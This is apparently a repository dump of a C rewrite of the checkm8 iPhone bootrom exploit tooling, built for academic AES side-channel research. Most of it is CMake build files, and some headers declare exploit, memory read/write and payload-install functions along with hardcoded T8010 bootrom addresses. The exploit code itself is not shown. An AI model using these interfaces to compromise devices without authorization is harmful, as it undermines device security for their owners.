IPWNDFU_REWRITE_C_CHECKM8_CONFIG_H 3 | 4 | //#define LIBUSB_LOGGING 5 | #define CHECKM8_LOGGING 6 | #define CHECKM8_PLATFORM 8010 7 | #define CHECKM8_BIN_BASE "/home/grg/Projects/School/NCSU/iphone_aes_sc/checkm8_tool/checkm8_remote/bin/" 8 | 9 | void checkm8_debug_indent(const char *format, ...); 10 | void checkm8_debug_block(const char *format, ...); 11 | 12 | #endif //IPWNDFU_REWRITE_C_CHECKM8_CONFIG_H 13 | -------------------------------------------------------------------------------- /checkm8_libusb/src/version.h: -------------------------------------------------------------------------------- 1 | /* This file is parsed by m4 and windres and RC.EXE so please keep it simple. */ 2 | #include "version_nano.h" 3 | #ifndef LIBUSB_MAJOR 4 | #define LIBUSB_MAJOR 1 5 | #endif 6 | #ifndef LIBUSB_MINOR 7 | #define LIBUSB_MINOR 0 8 | #endif 9 | #ifndef LIBUSB_MICRO 10 | #define LIBUSB_MICRO 23 11 | #endif 12 | #ifndef LIBUSB_NANO 13 | #define LIBUSB_NANO 0 14 | #endif 15 | /* LIBUSB_RC is the release candidate suffix. Should normally be empty. */ 16 | #ifndef LIBUSB_RC 17 | #define LIBUSB_RC "" 18 | #endif 19 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_aes.dir/depend.internal: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o 5 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/aes.c 6 | checkm8_payloads/include/brfunc_aes.h 7 | checkm8_payloads/include/brfunc_common.h 8 | checkm8_payloads/include/brfunc_sep.h 9 | checkm8_payloads/include/brfunc_timing.h 10 | checkm8_payloads/include/util.h 11 | include/checkm8_config.h 12 | -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/checkm8_remote.dir/cmake_clean.cmake: -------------------------------------------------------------------------------- 1 | file(REMOVE_RECURSE 2 | "CMakeFiles/checkm8_remote.dir/main.c.o" 3 | "CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o" 4 | "CMakeFiles/checkm8_remote.dir/src/exploit.c.o" 5 | "CMakeFiles/checkm8_remote.dir/src/payload.c.o" 6 | "CMakeFiles/checkm8_remote.dir/src/command.c.o" 7 | "checkm8_remote.pdb" 8 | "checkm8_remote" 9 | ) 10 | 11 | # Per-language clean rules from dependency scanning. 12 | foreach(lang C) 13 | include(CMakeFiles/checkm8_remote.dir/cmake_clean_${lang}.cmake OPTIONAL) 14 | endforeach() 15 | -------------------------------------------------------------------------------- /checkm8_remote/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | project(checkm8_remote C) 2 | 3 | set(CMAKE_C_STANDARD 99) 4 | set(CMAKE_C_FLAGS -g) 5 | 6 | include_directories(include) 7 | add_executable(checkm8_remote main.c src/libusb_helpers.c src/exploit.c src/payload.c src/command.c) 8 | add_custom_command(TARGET checkm8_remote POST_BUILD 9 | COMMAND ln 10 | ARGS -s -f -n 11 | ${PROJECT_SOURCE_DIR}/checkm8_payloads/bin 12 | ${CMAKE_CURRENT_SOURCE_DIR}/bin/payloads) 13 | 14 | target_link_libraries(checkm8_remote checkm8_libusb pthread udev) -------------------------------------------------------------------------------- /CMakeFiles/3.10.2/CMakeASMCompiler.cmake: -------------------------------------------------------------------------------- 1 | set(CMAKE_ASM_COMPILER "/usr/bin/cc") 2 | set(CMAKE_ASM_COMPILER_ARG1 "") 3 | set(CMAKE_AR "/usr/bin/ar") 4 | set(CMAKE_ASM_COMPILER_AR "/usr/bin/gcc-ar") 5 | set(CMAKE_RANLIB "/usr/bin/ranlib") 6 | set(CMAKE_ASM_COMPILER_RANLIB "/usr/bin/gcc-ranlib") 7 | set(CMAKE_LINKER "/usr/bin/ld") 8 | set(CMAKE_ASM_COMPILER_LOADED 1) 9 | set(CMAKE_ASM_COMPILER_ID "GNU") 10 | set(CMAKE_ASM_COMPILER_VERSION "") 11 | set(CMAKE_ASM_COMPILER_ENV_VAR "ASM") 12 | 13 | 14 | set(CMAKE_ASM_IGNORE_EXTENSIONS h;H;o;O;obj;OBJ;def;DEF;rc;RC) 15 | set(CMAKE_ASM_LINKER_PREFERENCE 0) 16 | 17 | 18 | -------------------------------------------------------------------------------- /CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.10) 2 | project(checkm8_tool) 3 | enable_language(C) 4 | 5 | include_directories(include) 6 | include_directories(checkm8_libusb/src) 7 | add_library(checkm8_libusb 8 | checkm8_libusb/src/core.c checkm8_libusb/src/descriptor.c checkm8_libusb/src/hotplug.c 9 | checkm8_libusb/src/io.c checkm8_libusb/src/strerror.c checkm8_libusb/src/sync.c 10 | 11 | checkm8_libusb/src/os/linux_netlink.c checkm8_libusb/src/os/linux_usbfs.c checkm8_libusb/src/os/linux_udev.c 12 | checkm8_libusb/src/os/threads_posix.c checkm8_libusb/src/os/poll_posix.c) 13 | 14 | add_subdirectory(checkm8_remote) 15 | add_subdirectory(checkm8_payloads) 16 | -------------------------------------------------------------------------------- /CMakeFiles/CMakeDirectoryInformation.cmake: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | # Relative path conversion top directories. 5 | set(CMAKE_RELATIVE_PATH_TOP_SOURCE "/home/toor/ipwndfu_rewrite_c") 6 | set(CMAKE_RELATIVE_PATH_TOP_BINARY "/home/toor/ipwndfu_rewrite_c") 7 | 8 | # Force unix paths in dependencies. 9 | set(CMAKE_FORCE_UNIX_PATHS 1) 10 | 11 | 12 | # The C and CXX include file regular expressions for this directory. 13 | set(CMAKE_C_INCLUDE_REGEX_SCAN "^.*$") 14 | set(CMAKE_C_INCLUDE_REGEX_COMPLAIN "^$") 15 | set(CMAKE_CXX_INCLUDE_REGEX_SCAN ${CMAKE_C_INCLUDE_REGEX_SCAN}) 16 | set(CMAKE_CXX_INCLUDE_REGEX_COMPLAIN ${CMAKE_C_INCLUDE_REGEX_COMPLAIN}) 17 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/CMakeDirectoryInformation.cmake: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | # Relative path conversion top directories. 5 | set(CMAKE_RELATIVE_PATH_TOP_SOURCE "/home/toor/ipwndfu_rewrite_c") 6 | set(CMAKE_RELATIVE_PATH_TOP_BINARY "/home/toor/ipwndfu_rewrite_c") 7 | 8 | # Force unix paths in dependencies. 9 | set(CMAKE_FORCE_UNIX_PATHS 1) 10 | 11 | 12 | # The C and CXX include file regular expressions for this directory. 13 | set(CMAKE_C_INCLUDE_REGEX_SCAN "^.*$") 14 | set(CMAKE_C_INCLUDE_REGEX_COMPLAIN "^$") 15 | set(CMAKE_CXX_INCLUDE_REGEX_SCAN ${CMAKE_C_INCLUDE_REGEX_SCAN}) 16 | set(CMAKE_CXX_INCLUDE_REGEX_COMPLAIN ${CMAKE_C_INCLUDE_REGEX_COMPLAIN}) 17 | -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/CMakeDirectoryInformation.cmake: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | # Relative path conversion top directories. 5 | set(CMAKE_RELATIVE_PATH_TOP_SOURCE "/home/toor/ipwndfu_rewrite_c") 6 | set(CMAKE_RELATIVE_PATH_TOP_BINARY "/home/toor/ipwndfu_rewrite_c") 7 | 8 | # Force unix paths in dependencies. 9 | set(CMAKE_FORCE_UNIX_PATHS 1) 10 | 11 | 12 | # The C and CXX include file regular expressions for this directory. 13 | set(CMAKE_C_INCLUDE_REGEX_SCAN "^.*$") 14 | set(CMAKE_C_INCLUDE_REGEX_COMPLAIN "^$") 15 | set(CMAKE_CXX_INCLUDE_REGEX_SCAN ${CMAKE_C_INCLUDE_REGEX_SCAN}) 16 | set(CMAKE_CXX_INCLUDE_REGEX_COMPLAIN ${CMAKE_C_INCLUDE_REGEX_COMPLAIN}) 17 | -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/link.txt: -------------------------------------------------------------------------------- 1 | /usr/bin/ar qc libcheckm8_libusb.a CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/core.c.o CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/descriptor.c.o CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/hotplug.c.o CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/io.c.o CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/strerror.c.o CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/sync.c.o CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_netlink.c.o CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_usbfs.c.o CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_udev.c.o CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/threads_posix.c.o CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/poll_posix.c.o 2 | /usr/bin/ranlib libcheckm8_libusb.a 3 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_aes.dir/DependInfo.cmake: -------------------------------------------------------------------------------- 1 | # The set of languages for which implicit dependencies are needed: 2 | set(CMAKE_DEPENDS_LANGUAGES 3 | "C" 4 | ) 5 | # The set of files for implicit dependencies of each language: 6 | set(CMAKE_DEPENDS_CHECK_C 7 | "/home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/aes.c" "/home/toor/ipwndfu_rewrite_c/checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o" 8 | ) 9 | set(CMAKE_C_COMPILER_ID "GNU") 10 | 11 | # The include file search paths: 12 | set(CMAKE_C_TARGET_INCLUDE_PATH 13 | "include" 14 | "checkm8_libusb/src" 15 | "checkm8_payloads/include" 16 | ) 17 | 18 | # Targets to which this target links. 19 | set(CMAKE_TARGET_LINKED_INFO_FILES 20 | ) 21 | 22 | # Fortran module output directory. 23 | set(CMAKE_Fortran_TARGET_MODULE_DIR "") 24 | -------------------------------------------------------------------------------- /CMakeFiles/TargetDirectories.txt: -------------------------------------------------------------------------------- 1 | /home/toor/ipwndfu_rewrite_c/CMakeFiles/rebuild_cache.dir 2 | /home/toor/ipwndfu_rewrite_c/CMakeFiles/checkm8_libusb.dir 3 | /home/toor/ipwndfu_rewrite_c/CMakeFiles/edit_cache.dir 4 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/CMakeFiles/rebuild_cache.dir 5 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/CMakeFiles/checkm8_remote.dir 6 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/CMakeFiles/edit_cache.dir 7 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/CMakeFiles/rebuild_cache.dir 8 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/CMakeFiles/payload_sysreg.dir 9 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/CMakeFiles/edit_cache.dir 10 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/CMakeFiles/payload_sync.dir 11 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/CMakeFiles/payload_aes.dir 12 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sync.dir/DependInfo.cmake: -------------------------------------------------------------------------------- 1 | # The set of languages for which implicit dependencies are needed: 2 | set(CMAKE_DEPENDS_LANGUAGES 3 | "C" 4 | ) 5 | # The set of files for implicit dependencies of each language: 6 | set(CMAKE_DEPENDS_CHECK_C 7 | "/home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/sync.c" "/home/toor/ipwndfu_rewrite_c/checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o" 8 | ) 9 | set(CMAKE_C_COMPILER_ID "GNU") 10 | 11 | # The include file search paths: 12 | set(CMAKE_C_TARGET_INCLUDE_PATH 13 | "include" 14 | "checkm8_libusb/src" 15 | "checkm8_payloads/include" 16 | ) 17 | 18 | # Targets to which this target links. 19 | set(CMAKE_TARGET_LINKED_INFO_FILES 20 | ) 21 | 22 | # Fortran module output directory. 23 | set(CMAKE_Fortran_TARGET_MODULE_DIR "") 24 | -------------------------------------------------------------------------------- /checkm8_arduino/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.10) 2 | set(CMAKE_TOOLCHAIN_FILE ${CMAKE_SOURCE_DIR}/cmake/ArduinoToolchain.cmake) 3 | set(CMAKE_CXX_STANDARD 98) 4 | project(checkm8_arduino) 5 | 6 | set(checkm8_arduino_libhostshield_BOARD uno) 7 | set(checkm8_arduino_libhostshield_SRCS lib/hostshield/Usb.cpp lib/hostshield/SPI.cpp) 8 | generate_arduino_library(checkm8_arduino_libhostshield) 9 | 10 | set(checkm8_arduino_BOARD uno) 11 | set(checkm8_arduino_HDRS include/User_Setup.h include/Usb.h) 12 | set(checkm8_arduino_LIBS checkm8_arduino_libhostshield) 13 | set(checkm8_arduino_SKETCH ${CMAKE_CURRENT_SOURCE_DIR}/src/checkm8_arduino.ino) 14 | set(checkm8_arduino_PROGRAMMER avrispmkii) 15 | set(checkm8_arduino_PORT /dev/ttyACM0) 16 | 17 | include_directories(include) 18 | generate_arduino_firmware(checkm8_arduino) -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_aes.dir/depend.make: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o: checkm8_payloads/src/aes.c 5 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o: checkm8_payloads/include/brfunc_aes.h 6 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o: checkm8_payloads/include/brfunc_common.h 7 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o: checkm8_payloads/include/brfunc_sep.h 8 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o: checkm8_payloads/include/brfunc_timing.h 9 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o: checkm8_payloads/include/util.h 10 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o: include/checkm8_config.h 11 | 12 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sysreg.dir/DependInfo.cmake: -------------------------------------------------------------------------------- 1 | # The set of languages for which implicit dependencies are needed: 2 | set(CMAKE_DEPENDS_LANGUAGES 3 | "C" 4 | ) 5 | # The set of files for implicit dependencies of each language: 6 | set(CMAKE_DEPENDS_CHECK_C 7 | "/home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/sysreg.c" "/home/toor/ipwndfu_rewrite_c/checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o" 8 | ) 9 | set(CMAKE_C_COMPILER_ID "GNU") 10 | 11 | # The include file search paths: 12 | set(CMAKE_C_TARGET_INCLUDE_PATH 13 | "include" 14 | "checkm8_libusb/src" 15 | "checkm8_payloads/include" 16 | ) 17 | 18 | # Targets to which this target links. 19 | set(CMAKE_TARGET_LINKED_INFO_FILES 20 | ) 21 | 22 | # Fortran module output directory. 23 | set(CMAKE_Fortran_TARGET_MODULE_DIR "") 24 | -------------------------------------------------------------------------------- /CMakeFiles/feature_tests.c: -------------------------------------------------------------------------------- 1 | 2 | const char features[] = {"\n" 3 | "C_FEATURE:" 4 | #if (__GNUC__ * 100 + __GNUC_MINOR__) >= 304 5 | "1" 6 | #else 7 | "0" 8 | #endif 9 | "c_function_prototypes\n" 10 | "C_FEATURE:" 11 | #if (__GNUC__ * 100 + __GNUC_MINOR__) >= 304 && defined(__STDC_VERSION__) && __STDC_VERSION__ >= 199901L 12 | "1" 13 | #else 14 | "0" 15 | #endif 16 | "c_restrict\n" 17 | "C_FEATURE:" 18 | #if (__GNUC__ * 100 + __GNUC_MINOR__) >= 406 && defined(__STDC_VERSION__) && __STDC_VERSION__ >= 201000L 19 | "1" 20 | #else 21 | "0" 22 | #endif 23 | "c_static_assert\n" 24 | "C_FEATURE:" 25 | #if (__GNUC__ * 100 + __GNUC_MINOR__) >= 304 && defined(__STDC_VERSION__) && __STDC_VERSION__ >= 199901L 26 | "1" 27 | #else 28 | "0" 29 | #endif 30 | "c_variadic_macros\n" 31 | 32 | }; 33 | 34 | int main(int argc, char** argv) { (void)argv; return features[argc]; } 35 | -------------------------------------------------------------------------------- /checkm8_payloads/include/brfunc_aes.h: -------------------------------------------------------------------------------- 1 | #ifndef IPWNDFU_REWRITE_C_BRFUNC_AES_H 2 | #define IPWNDFU_REWRITE_C_BRFUNC_AES_H 3 | 4 | #include "brfunc_common.h" 5 | 6 | #define AES_HW_CRYPTO_CMD ((BOOTROM_FUNC) ADDR_AES_HW_CRYPTO_CMD) 7 | 8 | #define CREATE_KEY_COMMAND ((BOOTROM_FUNC) ADDR_CREATE_KEY_COMMAND) 9 | #define PUSH_COMMAND_KEY ((BOOTROM_FUNC) ADDR_PUSH_COMMAND_KEY) 10 | #define PUSH_COMMAND_IV ((BOOTROM_FUNC) ADDR_PUSH_COMMAND_IV) 11 | #define PUSH_COMMAND_DATA ((BOOTROM_FUNC) ADDR_PUSH_COMMAND_DATA) 12 | #define PUSH_COMMAND_FLAG ((BOOTROM_FUNC) ADDR_PUSH_COMMAND_FLAG) 13 | #define WAIT_FOR_COMMAND_FLAG ((BOOTROM_FUNC) ADDR_WAIT_FOR_COMMAND) 14 | 15 | #define rAES_INT_STATUS (long *) ADDR_AES_CONTROL 16 | #define rAES_CONTROL (long *) ADDR_AES_STATUS 17 | 18 | #endif //IPWNDFU_REWRITE_C_BRFUNC_AES_H 19 | -------------------------------------------------------------------------------- /checkm8_remote/include/command.h: -------------------------------------------------------------------------------- 1 | #ifndef IPWNDFU_REWRITE_C_COMMAND_H 2 | #define IPWNDFU_REWRITE_C_COMMAND_H 3 | 4 | #include "checkm8.h" 5 | 6 | #define CMD_USB_READ_LIMIT 0xFF0 7 | 8 | struct dev_cmd_resp 9 | { 10 | int ret; 11 | unsigned long long magic; 12 | unsigned char *data; 13 | int len; 14 | }; 15 | 16 | struct dev_cmd_resp *dev_memset(struct pwned_device *dev, long long addr, unsigned char c, int len); 17 | struct dev_cmd_resp *dev_memcpy(struct pwned_device *dev, long long dest, long long src, int len); 18 | struct dev_cmd_resp *dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned long long *args); 19 | 20 | struct dev_cmd_resp *dev_read_memory(struct pwned_device *dev, long long addr, int len); 21 | struct dev_cmd_resp *dev_write_memory(struct pwned_device *dev, long long addr, unsigned char *data, int len); 22 | 23 | void free_dev_cmd_resp(struct dev_cmd_resp *resp); 24 | 25 | #endif //IPWNDFU_REWRITE_C_COMMAND_H 26 | -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/cmake_clean.cmake: -------------------------------------------------------------------------------- 1 | file(REMOVE_RECURSE 2 | "CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/core.c.o" 3 | "CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/descriptor.c.o" 4 | "CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/hotplug.c.o" 5 | "CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/io.c.o" 6 | "CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/strerror.c.o" 7 | "CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/sync.c.o" 8 | "CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_netlink.c.o" 9 | "CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_usbfs.c.o" 10 | "CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_udev.c.o" 11 | "CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/threads_posix.c.o" 12 | "CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/poll_posix.c.o" 13 | "libcheckm8_libusb.pdb" 14 | "libcheckm8_libusb.a" 15 | ) 16 | 17 | # Per-language clean rules from dependency scanning. 18 | foreach(lang C) 19 | include(CMakeFiles/checkm8_libusb.dir/cmake_clean_${lang}.cmake OPTIONAL) 20 | endforeach() 21 | -------------------------------------------------------------------------------- /checkm8_remote/include/payload.h: -------------------------------------------------------------------------------- 1 | #ifndef IPWNDFU_REWRITE_C_PAYLOAD_H 2 | #define IPWNDFU_REWRITE_C_PAYLOAD_H 3 | 4 | #include "checkm8.h" 5 | 6 | #define PAYLOAD_AES_BIN CHECKM8_BIN_BASE "payloads/payload_aes.bin" 7 | #define PAYLOAD_SYSREG_BIN CHECKM8_BIN_BASE "payloads/payload_sysreg.bin" 8 | #define PAYLOAD_SYNC_BIN CHECKM8_BIN_BASE "payloads/payload_sync.bin" 9 | 10 | typedef enum 11 | { 12 | PAYLOAD_SYNC, 13 | PAYLOAD_AES, 14 | PAYLOAD_SYSREG 15 | } PAYLOAD_T; 16 | 17 | typedef enum 18 | { 19 | SRAM, 20 | DRAM 21 | } LOCATION_T; 22 | 23 | #define RESP_VALUE(buf, type, i) ((type *) buf)[i] 24 | 25 | int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc); 26 | int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p); 27 | 28 | struct dev_cmd_resp *execute_payload(struct pwned_device *dev, PAYLOAD_T p, int nargs, ...); 29 | struct dev_cmd_resp *read_payload(struct pwned_device *dev, long long addr, int len); 30 | struct dev_cmd_resp *write_payload(struct pwned_device *dev, long long addr, unsigned char *data, int len); 31 | 32 | #endif //IPWNDFU_REWRITE_C_PAYLOAD_H 33 | -------------------------------------------------------------------------------- /checkm8_remote/include/checkm8.h: -------------------------------------------------------------------------------- 1 | #ifndef IPWNDFU_REWRITE_C_CHECKM8_H 2 | #define IPWNDFU_REWRITE_C_CHECKM8_H 3 | 4 | #include "checkm8_config.h" 5 | 6 | #define CHECKM8_SUCCESS 0 7 | #define CHECKM8_FAIL_INVARGS -1 8 | #define CHECKM8_FAIL_NODEV -2 9 | #define CHECKM8_FAIL_NOEXP -3 10 | #define CHECKM8_FAIL_NOTDONE -4 11 | #define CHECKM8_FAIL_XFER -5 12 | #define CHECKM8_FAIL_NOINST -6 13 | 14 | #define IS_CHECKM8_FAIL(code) code < 0 15 | 16 | #if CHECKM8_PLATFORM == 8010 17 | 18 | #define DEV_IDVENDOR 0x05AC 19 | #define DEV_IDPRODUCT 0x1227 20 | #define DFU_IMAGE_BASE 0x1800B0000 21 | 22 | #else 23 | #error "Unspported checkm8 platform" 24 | #endif 25 | 26 | struct pwned_device 27 | { 28 | enum 29 | { 30 | DEV_NORMAL, 31 | DEV_PWNED 32 | } status; 33 | 34 | unsigned int idVendor; 35 | unsigned int idProduct; 36 | 37 | struct libusb_device_bundle *bundle; 38 | struct payload *installed; 39 | }; 40 | 41 | struct pwned_device *exploit_device(); 42 | void free_device(struct pwned_device *dev); 43 | 44 | #endif //IPWNDFU_REWRITE_C_CHECKM8_H 45 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_aes.dir/C.includecache: -------------------------------------------------------------------------------- 1 | #IncludeRegexLine: ^[ ]*[#%][ ]*(include|import)[ ]*[<"]([^">]+)([">]) 2 | 3 | #IncludeRegexScan: ^.*$ 4 | 5 | #IncludeRegexComplain: ^$ 6 | 7 | #IncludeRegexTransform: 8 | 9 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/aes.c 10 | brfunc_aes.h 11 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/brfunc_aes.h 12 | brfunc_timing.h 13 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/brfunc_timing.h 14 | brfunc_sep.h 15 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/brfunc_sep.h 16 | util.h 17 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/util.h 18 | 19 | checkm8_payloads/include/brfunc_aes.h 20 | brfunc_common.h 21 | checkm8_payloads/include/brfunc_common.h 22 | 23 | checkm8_payloads/include/brfunc_common.h 24 | checkm8_config.h 25 | checkm8_payloads/include/checkm8_config.h 26 | 27 | checkm8_payloads/include/brfunc_sep.h 28 | brfunc_common.h 29 | checkm8_payloads/include/brfunc_common.h 30 | 31 | checkm8_payloads/include/brfunc_timing.h 32 | brfunc_common.h 33 | checkm8_payloads/include/brfunc_common.h 34 | 35 | checkm8_payloads/include/util.h 36 | 37 | include/checkm8_config.h 38 | 39 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | project(checkm8_payloads ASM) 2 | include_directories(include) 3 | 4 | set(CMAKE_SYSTEM_PROCESSOR arm) 5 | 6 | if(${CMAKE_HOST_SYSTEM_PROCESSOR} STREQUAL "x86_64") 7 | set(CMAKE_C_COMPILER /usr/bin/aarch64-linux-gnu-gcc) 8 | set(CMAKE_ASM_COMPILER /usr/bin/aarch64-linux-gnu-as) 9 | set(CMAKE_OBJCOPY /usr/bin/aarch64-linux-gnu-objcopy) 10 | endif() 11 | 12 | set(CMAKE_C_FLAGS "-nostdlib -O") 13 | 14 | set(PAYLOADS payload_sync payload_aes payload_sysreg) 15 | add_executable(payload_sync src/sync.c) 16 | add_executable(payload_aes src/aes.c) 17 | add_executable(payload_sysreg src/sysreg.c) 18 | 19 | file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/bin/) 20 | set_directory_properties(PROPERTY ADDITIONAL_CLEAN_FILES "${CMAKE_CURRENT_SOURCE_DIR}/bin/") 21 | 22 | foreach(BINARY ${PAYLOADS}) 23 | add_custom_command(TARGET ${BINARY} POST_BUILD 24 | BYPRODUCTS ${CMAKE_CURRENT_SOURCE_DIR}/bin/${BINARY}.bin 25 | COMMAND ${CMAKE_OBJCOPY} 26 | ARGS -O binary -j .text -j .payload_text 27 | ${CMAKE_CURRENT_BINARY_DIR}/${BINARY} 28 | ${CMAKE_CURRENT_SOURCE_DIR}/bin/${BINARY}.bin) 29 | endforeach(BINARY) -------------------------------------------------------------------------------- /checkm8_payloads/include/brfunc_common.h: -------------------------------------------------------------------------------- 1 | #ifndef IPWNDFU_REWRITE_C_BRFUNC_COMMON_H 2 | #define IPWNDFU_REWRITE_C_BRFUNC_COMMON_H 3 | 4 | #include "checkm8_config.h" 5 | 6 | typedef int (*BOOTROM_FUNC)(); 7 | 8 | #if CHECKM8_PLATFORM == 8010 9 | 10 | /* AES */ 11 | #define ADDR_AES_HW_CRYPTO_CMD 0x100000f0c 12 | #define ADDR_CREATE_KEY_COMMAND 0x100000e90 13 | #define ADDR_PUSH_COMMAND_KEY 0x100000c64 14 | #define ADDR_PUSH_COMMAND_IV 0x100000d18 15 | #define ADDR_PUSH_COMMAND_DATA 0x100000d98 16 | #define ADDR_PUSH_COMMAND_FLAG 0x100000e20 17 | #define ADDR_WAIT_FOR_COMMAND 0x100000ec4 18 | 19 | #define ADDR_AES_CONTROL 0x20A108008 20 | #define ADDR_AES_STATUS 0x20A108018 21 | 22 | /* SEP */ 23 | #define ADDR_DPA_SEEDED 0x100001140 24 | #define ADDR_SEND_DPA_MESSAGE 0x100002338 25 | 26 | /* Timing */ 27 | #define ADDR_CLOCK_GATE 0x100009d4c 28 | #define ADDR_SYSTEM_TIME 0x10000B0E0 29 | #define ADDR_TIME_HAS_ELAPSED 0x10000B04F 30 | 31 | #else 32 | #error "Unsupported checkm8 platform" 33 | #endif 34 | 35 | #endif //IPWNDFU_REWRITE_C_BRFUNC_COMMON_H 36 | -------------------------------------------------------------------------------- /checkm8_remote/cmake_install.cmake: -------------------------------------------------------------------------------- 1 | # Install script for directory: /home/toor/ipwndfu_rewrite_c/checkm8_remote 2 | 3 | # Set the install prefix 4 | if(NOT DEFINED CMAKE_INSTALL_PREFIX) 5 | set(CMAKE_INSTALL_PREFIX "/usr/local") 6 | endif() 7 | string(REGEX REPLACE "/$" "" CMAKE_INSTALL_PREFIX "${CMAKE_INSTALL_PREFIX}") 8 | 9 | # Set the install configuration name. 10 | if(NOT DEFINED CMAKE_INSTALL_CONFIG_NAME) 11 | if(BUILD_TYPE) 12 | string(REGEX REPLACE "^[^A-Za-z0-9_]+" "" 13 | CMAKE_INSTALL_CONFIG_NAME "${BUILD_TYPE}") 14 | else() 15 | set(CMAKE_INSTALL_CONFIG_NAME "") 16 | endif() 17 | message(STATUS "Install configuration: \"${CMAKE_INSTALL_CONFIG_NAME}\"") 18 | endif() 19 | 20 | # Set the component getting installed. 21 | if(NOT CMAKE_INSTALL_COMPONENT) 22 | if(COMPONENT) 23 | message(STATUS "Install component: \"${COMPONENT}\"") 24 | set(CMAKE_INSTALL_COMPONENT "${COMPONENT}") 25 | else() 26 | set(CMAKE_INSTALL_COMPONENT) 27 | endif() 28 | endif() 29 | 30 | # Install shared libraries without execute permission? 31 | if(NOT DEFINED CMAKE_INSTALL_SO_NO_EXE) 32 | set(CMAKE_INSTALL_SO_NO_EXE "1") 33 | endif() 34 | 35 | # Is this installation the result of a crosscompile? 36 | if(NOT DEFINED CMAKE_CROSSCOMPILING) 37 | set(CMAKE_CROSSCOMPILING "FALSE") 38 | endif() 39 | 40 | -------------------------------------------------------------------------------- /checkm8_payloads/cmake_install.cmake: -------------------------------------------------------------------------------- 1 | # Install script for directory: 